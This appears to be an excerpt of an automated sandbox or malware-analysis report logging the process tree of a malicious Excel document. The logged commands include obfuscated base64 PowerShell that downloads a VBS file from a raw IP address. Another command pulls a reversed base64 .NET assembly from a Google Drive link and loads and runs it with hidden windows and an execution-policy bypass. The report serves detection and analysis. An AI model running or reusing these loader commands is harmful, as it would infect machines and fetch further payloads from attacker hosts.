          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jk3wn0wt\jk3wn0wt.cmdline"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB606.tmp" "c:\Users\user\AppData\Local\Temp\jk3wn0wt\CSCA3D842248D9345F9BBF58E745EE55AE.TMP"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenTJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.cmdline"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7224.tmp" "c:\Users\user\AppData\Local\Temp\brij5btb\CSCD2DC83D8CE34483988FC31C99ACC1C8B.TMP"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgI